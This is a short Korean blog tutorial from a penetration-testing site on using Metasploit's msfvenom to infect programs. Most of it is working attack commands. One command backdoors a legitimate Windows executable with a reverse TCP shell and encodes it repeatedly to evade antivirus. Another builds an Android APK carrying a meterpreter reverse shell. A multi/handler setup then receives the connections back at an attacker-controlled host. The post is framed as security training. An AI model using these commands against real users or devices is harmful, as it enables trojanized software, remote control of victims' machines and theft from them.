| | at : |
Archive

[MAD-METASPLOIT] 0x22 - Malware and Infection 하훌 rwxr-xr-x 0 8/07/2017



[MAD-METASPLOIT] 0x22 - Malware and Infection

Permission rw-r--r--
Author 하훌
Date and Time 8/07/2017
Label
License 크리에이티브 커먼즈 라이선스


c


msfvenom?

Metasploit framework 중 일부이며 payload가 담긴 파일(exe, apk, dll 등 여러가지) 생성 및 주입에 사용됩니다. 간단한 명령행으로 편하게 사용할 수 있으니 알아두시면 좋습니다. 주요 옵션군을 정리하면 아래와 같습니다.

-x : 감염시킬 프로그램
-p : 삽입할 Payload
-e : 인코딩
-f : 포맷

msfvenom을 이용한 Application Infection

#> msfvenom -x nomal_app.exe -p windows/shell/reverse_tcp -e x86/shikata_ga_nai -k -f exe -i 25 LHOST=xxx.xxx.xxx.xxx LPORT=4444 > output.exe

msfvenom을 이용한 Android APK Infection

#> msfvenom -p android/meterpreter/reverse_tcp LHOST=***.***.***.*** LPORT=4444 R > test_shell.apk

Handler를 통한 Shell 연결

HAHWUL > use exploit/multi/handler 

Application
HAHWUL > windows/shell/reverse_tcp

Android APK
HAHWUL > android/meterpreter/reverse_tcp

Reference

http://www.hahwul.com/2015/06/msfvenom-application-exploit-code.html
http://www.hahwul.com/2015/08/metasploit-msfvenom-android-meterpreter.html

Share







HAHWUL
HACKING | PENETRATION-TEST | CODING
HACKERONE : GIT : 0DAY-TODAY : EXPLOIT-DB : PACKETSTORM
GOOGLE+ | HAHWUL@GMAIL.COM | TWITTER
WWW.HAHWUL.COM




0 개의 댓글:

댓글 쓰기